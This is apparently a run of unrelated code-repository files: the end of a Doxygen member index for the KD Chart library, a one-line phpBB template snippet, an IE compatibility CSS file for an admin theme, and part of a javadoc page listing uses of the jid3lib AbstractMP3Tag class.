href="class_k_d_chart_1_1_position.html#1fb29beb25b3d0c621d5e783ca60e64b">KDChart::Position</a> <li>isEastSide() : <a class="el" href="class_k_d_chart_1_1_position.html#1a760284c064e755feb8d50176644dac">KDChart::Position</a> <li>isEmpty() : <a class="el" href="class_k_d_chart_1_1_line_layout_item.html#f2313ec125658898284147661814eb63">KDChart::LineLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_line_with_marker_layout_item.html#a746780560746bc7aa3e8cb5fa6a066d">KDChart::LineWithMarkerLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_text_layout_item.html#4981e4394956451f6a176ae0d8b1d158">KDChart::TextLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_vertical_line_layout_item.html#920d968280f54cacd515615656176ad7">KDChart::VerticalLineLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_horizontal_line_layout_item.html#df0f3faef56ac95f020f3e9e46d6d718">KDChart::HorizontalLineLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_abstract_coordinate_plane.html#fc73298c1919345d9f43cbdb75134388">KDChart::AbstractCoordinatePlane</a> , <a class="el" href="class_k_d_chart_1_1_auto_spacer_layout_item.html#bd629cad8a53a9184ece22e6d2702b15">KDChart::AutoSpacerLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_text_layout_item.html#4981e4394956451f6a176ae0d8b1d158">KDChart::TextLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_cartesian_axis.html#e7f9c981e7cb2985ccdab436d5199ff6">KDChart::CartesianAxis</a> , <a class="el" href="class_k_d_chart_1_1_abstract_coordinate_plane.html#fc73298c1919345d9f43cbdb75134388">KDChart::AbstractCoordinatePlane</a> , <a class="el" href="class_k_d_chart_1_1_ternary_axis.html#dc7ed9eb9e9dfe3b95ff16e730a2a512">KDChart::TernaryAxis</a> , <a class="el" href="class_k_d_chart_1_1_text_layout_item.html#4981e4394956451f6a176ae0d8b1d158">KDChart::TextLayoutItem</a> , <a class="el" href="class_k_d_chart_1_1_abstract_coordinate_plane.html#fc73298c1919345d9f43cbdb75134388">KDChart::AbstractCoordinatePlane</a> , <a class="el" href="class_k_d_chart_1_1_marker_layout_item.html#70bb60817c20457fbabe7b727aa11bea">KDChart::MarkerLayoutItem</a> <li>isEnabled() : <a class="el" href="class_k_d_chart_1_1_abstract_three_d_attributes.html#ccb9bb7617be15991b9942610e682359">KDChart::AbstractThreeDAttributes</a> , <a class="el" href="class_k_d_chart_1_1_value_tracker_attributes.html#f5c76bf02a8a5323438458d7dbe6d857">KDChart::ValueTrackerAttributes</a> , <a class="el" href="class_k_d_chart_1_1_abstract_three_d_attributes.html#ccb9bb7617be15991b9942610e682359">KDChart::AbstractThreeDAttributes</a> <li>isEqualTo() : <a class="el" href="class_k_d_chart_1_1_background_attributes.html#2990b4d2df0bf5a950ecbef48a973734">KDChart::BackgroundAttributes</a> <li>isFloating() : <a class="el" href="class_k_d_chart_1_1_position.html#5daeb6385f807e459603454f21d8d1cf">KDChart::Position</a> <li>isGridVisible() : <a class="el" href="class_k_d_chart_1_1_grid_attributes.html#11dc25131a5f12a375659a4c59de11f4">KDChart::GridAttributes</a> <li>isHidden() : <a class="el" href="class_k_d_chart_1_1_abstract_diagram.html#99dbec27a8a52b68cd7f60f9e0e8f4c2">KDChart::AbstractDiagram</a> <li>isHorizontalRangeReversed() : <a class="el" href="class_k_d_chart_1_1_cartesian_coordinate_plane.html#6d628fb411ebbc6e7866ebcb0bba6952">KDChart::CartesianCoordinatePlane</a> <li>isIndexHidden() : <a class="el" href="class_k_d_chart_1_1_abstract_diagram.html#e285981d34c0c2de724187d1aa3160b5">KDChart::AbstractDiagram</a> <li>isKnownAttributesRole() : <a class="el" href="class_k_d_chart_1_1_attributes_model.html#ac5d59c412bc7e75ed026e44b8f83562">KDChart::AttributesModel</a> <li>isNorthSide() : <a class="el" href="class_k_d_chart_1_1_position.html#bd23b72e64e9e8802943763e7e0f00cf">KDChart::Position</a> <li>isNull() : <a class="el" href="class_k_d_chart_1_1_position_points.html#e9259724d525ca4d48b4c94860d371c4">KDChart::PositionPoints</a> <li>isOrdinate() : <a class="el" href="class_k_d_chart_1_1_cartesian_axis.html#603169e55ac4268da059657b67996d87">KDChart::CartesianAxis</a> <li>isPole() : <a class="el" href="class_k_d_chart_1_1_position.html#d5697fb72482de4386fbe56ed9936a60">KDChart::Position</a> <li>isRubberBandZoomingEnabled() : <a class="el" href="class_k_d_chart_1_1_abstract_coordinate_plane.html#8484d18409954b6d3a3a76e74b4a086a">KDChart::AbstractCoordinatePlane</a> <li>isSouthSide() : <a class="el" href="class_k_d_chart_1_1_position.html#a41c012874d1288e69bb3437a00442b3">KDChart::Position</a> <li>isSubGridVisible() : <a class="el" href="class_k_d_chart_1_1_grid_attributes.html#841188e7cee6c3425e8ff891e090b35f">KDChart::GridAttributes</a> <li>isUnknown() : <a class="el" href="class_k_d_chart_1_1_position.html#52387d04cd9e4b1e557bc2d914553a5b">KDChart::Position</a> <li>isValid() : <a class="el" href="class_k_d_chart_1_1_palette.html#6c7503dff1c8d72125044d10088ded27">KDChart::Palette</a> , <a class="el" href="class_ternary_point.html#1202002d55eaec377b1e0b85692298fd">TernaryPoint</a> <li>isVerticalRangeReversed() : <a class="el" href="class_k_d_chart_1_1_cartesian_coordinate_plane.html#38e71596b2b1acb412b3f2c066967d3e">KDChart::CartesianCoordinatePlane</a> <li>isVisible() : <a class="el" href="class_k_d_chart_1_1_frame_attributes.html#3173d8a3b744e4b2f144d87dcd03b524">KDChart::FrameAttributes</a> , <a class="el" href="class_k_d_chart_1_1_text_attributes.html#4fbcf534c3a8ff7e753f1a3c72eda13d">KDChart::TextAttributes</a> , <a class="el" href="class_k_d_chart_1_1_data_value_attributes.html#f22b0cb8dbbed1a36cb9dcd670d0188f">KDChart::DataValueAttributes</a> , <a class="el" href="class_k_d_chart_1_1_marker_attributes.html#e4ad3f43fb228e6c74157d9425d808a4">KDChart::MarkerAttributes</a> , <a class="el" href="class_k_d_chart_1_1_background_attributes.html#e523621e65a081bf5b720bf9e5c1b576">KDChart::BackgroundAttributes</a> <li>isVisiblePoint() : <a class="el" href="class_k_d_chart_1_1_abstract_coordinate_plane.html#4e71216c521d57d79d14ac64058d63f4">KDChart::AbstractCoordinatePlane</a> <li>isWestSide() : <a class="el" href="class_k_d_chart_1_1_position.html#7e2b479a791cb4dd1f48318f6a5a321f">KDChart::Position</a> <li>itemRowLabels() : <a class="el" href="class_k_d_chart_1_1_abstract_diagram.html#3f9de4c45dd123d52e3b9a2e939acea9">KDChart::AbstractDiagram</a> </ul> <hr size="1"><address style="align: right;"><small>Generated on Mon Sep 17 16:17:55 2007 for KD Chart 2 by&nbsp; <a href="http://www.doxygen.org/index.html"> <img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.1 </small></address> </body> </html>
styles/all/template/event/simple_footer_after.html
LotusJeff/showtemplate
<div class='lotusjeff_showtemplate'>simple_footer_after</div>
Code/NoRain.MainWeb/BackAssets/css/ace-ie.min.css
DonnotRain/NoRainWeb
.sidebar { *left: 0; } .sidebar:before { display: none; } .ace-nav > li.white-opaque { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#CCFFFFFF',endColorstr='#CCFFFFFF',GradientType=0); } .ace-nav > li.dark-opaque { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#33000000',endColorstr='#33000000',GradientType=0); } .infobox > .infobox-icon > [class*="icon-"]:before { color: #FFF; } .infobox-dark > .badge { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#33FFFFFF',endColorstr='#33FFFFFF',GradientType=0)!important; } .widget-box-overlay { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#55000000',endColorstr='#55000000',GradientType=0)!important; } .widget-toolbar-light { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#D8FFFFFF',endColorstr='#D8FFFFFF',GradientType=0)!important; } input[type=checkbox].ace, input[type=radio].ace { position: static; width: auto; height: auto; z-index: auto; } input[type=checkbox].ace + .lbl, input[type=radio].ace + .lbl { min-height: auto; min-width: auto; } input[type=checkbox].ace.ace-switch { width: auto; } input[type=checkbox].ace.ace-switch + .lbl { margin: 0; min-height: auto; } input[type=checkbox].ace.ace-switch-7 { width: auto; } .ace-file-input input[type=file] { width: 100%; height: 30px; position: absolute; z-index: 1; filter: alpha(opacity=0); cursor: pointer; } .ace-file-input input[type=file]:hover + .file-label { border-color: #f59942; } .ace-file-multiple input[type=file] { height: 100%; } .ace-file-input .remove { z-index: 2; } .ace-file-input .file-label.selected .file-name { width: 50%; } .ace-file-multiple .file-label.selected .file-name { width: auto; } .wizard-steps li:first-child:before { max-width: 100%; left: 0; } .login-layout .widget-box { display: none; visibility: visible; position: static; } .login-layout .widget-box.visible { display: block; } .pricing-box-small:hover { zoom: 1.04; left: -1px; top: -3px; } .ace-thumbnails > li > a > img { width: auto!important; } .ace-thumbnails > li > :first-child > .text { display: none; } .ace-thumbnails > li:hover > :first-child > .text { display: block; } .ace-thumbnails > li > .tools { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#8C000000',endColorstr='#8C000000',GradientType=0)!important; } .ace-thumbnails > li > :first-child > .text { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#8C000000',endColorstr='#8C000000',GradientType=0)!important; } #cboxLoadingGraphic > [class*="icon-"] { display: inline-block; background: #FFF url('images/loading.gif') no-repeat center; } #cboxLoadingGraphic > [class*="icon-"]:before { display: none; } .widget-box-overlay > [class*="icon-"] { display: inline-block; width: 24px; height: 24px; margin-left: 46%; background: transparent url('images/loading.gif') no-repeat center; } .widget-box-overlay > [class*="icon-"]:before { display: none; } .btn.btn-app.btn-light { border: 1px solid #d9d9d9; } .btn.btn-app.btn-yellow { border: 1px solid #fee188; } .grid3 { width: 31%; } .grid4 { width: 23%; } .itemdiv.dialogdiv > .body:before { display: none; } .fc-event-hori, .fc-event-vert { border: none!important; } [class*="tab-color-"] .nav-tabs > li > a > [class*="icon-"]:first-child { color: #666!important; } .dropdown-preview > .dropdown-menu { *width: 180px; } .ui-datepicker, .ui-autocomplete, .ui-menu { border: 1px solid #CCC; } .ui-widget-overlay { filter: alpha(opacity=100)!important; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#44000000',endColorstr='#44000000',GradientType=0)!important; } .message-content { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#CCFFFFFF',endColorstr='#CCFFFFFF',GradientType=0)!important; } .gritter-item-wrapper { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#EA323232',endColorstr='#EA323232',GradientType=0)!important; } .gritter-item-wrapper.gritter-info { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#EA315185',endColorstr='#EA315185',GradientType=0)!important; } .gritter-item-wrapper.gritter-error { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#EA992812',endColorstr='#EA992812',GradientType=0)!important; } .gritter-item-wrapper.gritter-success { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#EA59834B',endColorstr='#EA59834B',GradientType=0)!important; } .gritter-item-wrapper.gritter-warning { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#EABE701F',endColorstr='#EABE701F',GradientType=0)!important; } .gritter-item-wrapper.gritter-light { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#F2F5F5F5',endColorstr='#F2F5F5F5',GradientType=0)!important; } .gritter-info.gritter-light { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#F2E8F2FF',endColorstr='#F2E8F2FF',GradientType=0)!important; } .gritter-error.gritter-light { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#F2FFEBEB',endColorstr='#F2FFEBEB',GradientType=0)!important; } .gritter-success.gritter-light { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#F2EFFAE3',endColorstr='#F2EFFAE3',GradientType=0)!important; } .gritter-warning.gritter-light { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#F2FCF8E3',endColorstr='#F2FCF8E3',GradientType=0)!important; } .widget-header .wysiwyg-toolbar .btn-group > .btn, .widget-body .md-header .btn { background: transparent none!important; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#40FFFFFF',endColorstr='#40FFFFFF',GradientType=0)!important; } .widget-header .wysiwyg-toolbar .btn-group > .btn.active, .widget-body .md-header .btn-inverse { background: transparent none!important; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#40000000',endColorstr='#40000000',GradientType=0)!important; } .widget-body .md-header .btn, .widget-body .md-header .btn-inverse { display: none; } body.skin-3, .skin-3 .sidebar { background-color: #d6d6d6; } .skin-3 .menu-min .nav-list > li.active > a { background-color: #eef8ff; } body.skin-2, .skin-2 .sidebar { background-color: #505050; } .skin-2 .nav-list > li:hover > a > span { color: #FFF; } .skin-2 .nav-list > li:hover > a > [class*="icon-"]:first-child { color: #FFF; } .skin-2 .menu-min .nav-list > li > a:hover > [class*="icon-"]:first-child { color: #FFF; } .rtl .nav-list li.active > a:after { border-left-color: transparent; border-right-color: #0b6cbc; } .rtl.skin-1 .nav-list li.active > a:after { border-right-color: #FFF; border-left-color: transparent; } .rtl.skin-1 .menu-min .nav-list li.active:hover > a:after { border-right-color: #242a2b; } .rtl.skin-2 .nav-list li.active > a:after { border-right-color: #FFF; border-left-color: transparent; } .rtl.skin-2 .menu-min .nav-list li.active:hover > a:after { border-right-color: #292929; border-left-color: transparent; } .rtl.skin-2 .nav-list li.active.open > .submenu > li.active > a:after { border-right-color: #FFF; border-left-color: transparent; } .rtl.skin-3 .nav-list li.active > a:after { border-right-color: #FFF; border-left-color: transparent; } .rtl.skin-3 .nav-list li.active > a:before { border-right-color: #a4c6dd; border-left-color: transparent; }
stegaMP3/jid3lib-0.5.4/jid3lib-0.5.4/api/org/farng/mp3/class-use/AbstractMP3Tag.html
ibnoe/steganography-dalam-file-music-mp3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.4.2_11) on Tue Mar 14 21:50:52 EST 2006 --> <TITLE> Uses of Class org.farng.mp3.AbstractMP3Tag (jid3lib 0.5.4) </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { parent.document.title="Uses of Class org.farng.mp3.AbstractMP3Tag (jid3lib 0.5.4)"; } </SCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="AbstractMP3Tag.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.farng.mp3.AbstractMP3Tag</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Packages that use <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.farng.mp3"><B>org.farng.mp3</B></A></TD> <TD>Start with AbstractMP3Tag or MP3File&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.farng.mp3.filename"><B>org.farng.mp3.filename</B></A></TD> <TD>Start with FilenameTag&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.farng.mp3.id3"><B>org.farng.mp3.id3</B></A></TD> <TD>Start with ID3v1, ID3v1_1, ID3v2_2, ID3v2_2Frame, ID3v2_3, ID3v2_3Frame, ID3v2_4, or ID3v2_4Frame.&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.farng.mp3.lyrics3"><B>org.farng.mp3.lyrics3</B></A></TD> <TD>Start with Lyrics3v1 or Lyrics3v2&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.farng.mp3"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A> in <A HREF="../../../../org/farng/mp3/package-summary.html">org.farng.mp3</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../org/farng/mp3/package-summary.html">org.farng.mp3</A> with parameters of type <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>MP3File.</B><B><A HREF="../../../../org/farng/mp3/MP3File.html#setID3v1Tag(org.farng.mp3.AbstractMP3Tag)">setID3v1Tag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sets the <code>ID3v1</code> tag for this object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>MP3File.</B><B><A HREF="../../../../org/farng/mp3/MP3File.html#setID3v2Tag(org.farng.mp3.AbstractMP3Tag)">setID3v2Tag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sets the <code>ID3v2</code> tag for this object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>MP3File.</B><B><A HREF="../../../../org/farng/mp3/MP3File.html#setLyrics3Tag(org.farng.mp3.AbstractMP3Tag)">setLyrics3Tag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sets the <code>Lyrics3</code> tag for this object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>MP3File.</B><B><A HREF="../../../../org/farng/mp3/MP3File.html#delete(org.farng.mp3.AbstractMP3Tag)">delete</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;boolean</CODE></FONT></TD> <TD><CODE><B>AbstractMP3Tag.</B><B><A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html#isSubsetOf(org.farng.mp3.AbstractMP3Tag)">isSubsetOf</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns true if this tag is a subset of the argument.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>abstract &nbsp;void</CODE></FONT></TD> <TD><CODE><B>AbstractMP3Tag.</B><B><A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This method does nothing, but is called by subclasses for completeness</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>abstract &nbsp;void</CODE></FONT></TD> <TD><CODE><B>AbstractMP3Tag.</B><B><A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This method does nothing, but is called by subclasses for completeness</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>abstract &nbsp;void</CODE></FONT></TD> <TD><CODE><B>AbstractMP3Tag.</B><B><A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This method does nothing, but is called by subclasses for completeness</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Constructors in <A HREF="../../../../org/farng/mp3/package-summary.html">org.farng.mp3</A> with parameters of type <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html#AbstractMP3Tag(org.farng.mp3.AbstractMP3Tag)">AbstractMP3Tag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;copyObject)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new AbstractMP3Tag object.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.farng.mp3.filename"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A> in <A HREF="../../../../org/farng/mp3/filename/package-summary.html">org.farng.mp3.filename</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Subclasses of <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A> in <A HREF="../../../../org/farng/mp3/filename/package-summary.html">org.farng.mp3.filename</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/filename/FilenameTag.html" title="class in org.farng.mp3.filename">FilenameTag</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This class represents the filename.</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../org/farng/mp3/filename/package-summary.html">org.farng.mp3.filename</A> with parameters of type <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>FilenameToken.</B><B><A HREF="../../../../org/farng/mp3/filename/FilenameToken.html#matchAgainstTag(org.farng.mp3.AbstractMP3Tag)">matchAgainstTag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;matchTag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Match all elements of this composite against the given tag.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>FilenameTag.</B><B><A HREF="../../../../org/farng/mp3/filename/FilenameTag.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" 